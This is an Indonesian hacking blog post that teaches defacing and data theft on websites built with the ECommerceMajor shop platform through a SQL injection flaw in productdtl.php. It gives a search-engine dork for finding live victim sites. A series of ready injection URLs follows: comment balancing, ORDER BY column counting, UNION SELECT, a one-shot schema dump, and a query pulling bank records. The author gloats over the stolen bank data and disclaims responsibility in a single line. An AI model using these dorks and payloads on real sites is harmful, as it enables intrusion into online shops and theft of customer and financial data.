Jumat, 17 Februari 2017

ECommerceMajor SQL Injection Vulnerability


Stay Cool and Keep ./Crotz gaes, kali ini gue 3xBitCh bakal Share Tutorial Deface Website dengan eXploit ECommerceMajor SQL Injection Vulnerability.

cielahh kalo baca/ denger kata yang berbau E-Commerce biasanya para kardiman pada merapat nih awkkw.
yoi E Commerce Major ini salah satu platforms utk online business, kemungkinan besar semua website online shop :D

hadeh dump dump dump akwkkakw.
Happy Injector, kuy langsung disimak.


#Exploit Author : Rahul Pratap Singh
#Date           : 13/Dec/2015
#Home page Link : https://github.com/xlinkerz/ecommerceMajor
#Website        : 0x62626262.wordpress.com
#Linkedin       : https://in.linkedin.com/in/rahulpratapsingh94

Dork : inurl:/productdtl.php site:.

eXploit : productdtl.php?prodid=<SQLI>

1. pertama kita cari target menggunakan dork diatas.
Setelah kita mendapatkan target, lakukan tes untuk mengetahui vuln atau tidak menggunakan
contoh : 127.0.0.1/productdtl.php?prodid=1


2. coba kita balance dengan +--+
contoh :  127.0.0.1/productdtl.php?prodid=1+--+


3. jika halaman menjadi seperti semula, berarti balance sukses

coba kita menghitung jumlah column nya dengan menggunakan order by

contoh :  
127.0.0.1/productdtl.php?prodid=1+order+by+1--+ → tidak error
127.0.0.1/productdtl.php?prodid=1+order+by+2--+ → tidak error
127.0.0.1/productdtl.php?prodid=1+order+by+3--+ → tidak error
127.0.0.1/productdtl.php?prodid=1+order+by+10--+ → tidak error
127.0.0.1/productdtl.php?prodid=1+order+by+11--+error, berarti jumlah columnnya 10.

sekarang kita cari angka ajaibnya menggunakan union select

contoh :
127.0.0.1/productdtl.php?prodid=-1+union+select+1,2,3,4,5,6,7,8,9,10--+


4. nah angka ajaibnya muncul, sekarang kita dump menggunakan DIOS nya mas madblood

contoh: 127.0.0.1/productdtl.php?prodid=1+productdtl.php?prodid=-2+union+select+1,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),3,4,5,6,7,8,9,10--+


5. nah muncul kan? Tuh liat ada data bank juga xixixixi
sekarang kita coba dump lagi data datanya xixixix

contoh :
127.0.0.1/productdtl.php?prodid=-2+union+select+1,group_concat(bnk_title,0x3a,bnk_name,0x3a,bnk_br,0x3a,bnk_city),3,4,5,6,7,8,9,10 from cp_info--+


tuh keluarkan data datanya? Xixixix

Artikel Tutorial yang ada diBlog ini hanya untuk pembelajaran ya kak, jadi segala perbuatan yang Lu lakukan, semua di tanggung sang pembaca.
Kami tidak bertanggung jawab setidikpun, kami Hanya membantu para pembaca yang pemula seperti kami, jadi jangan banyakin Drama gak jelas wkwkwk.
Kalo ada pertanyaan silahkan ke fanspage atau Official Account Line kami.

happy hacking SQL Injection guys :)

3xBitCh








Visit and follow :

FP         : TKJ Cyber Art
G+         : TKJ Cyber Art
youtube : TKJ Cyber Art
BBM      : C0018D1A2
Line       : http://line.me/ti/p/%40hjl8740i

0 komentar:

Posting Komentar

 

ande ande lumoet Template by Ipietoon Cute Blog Design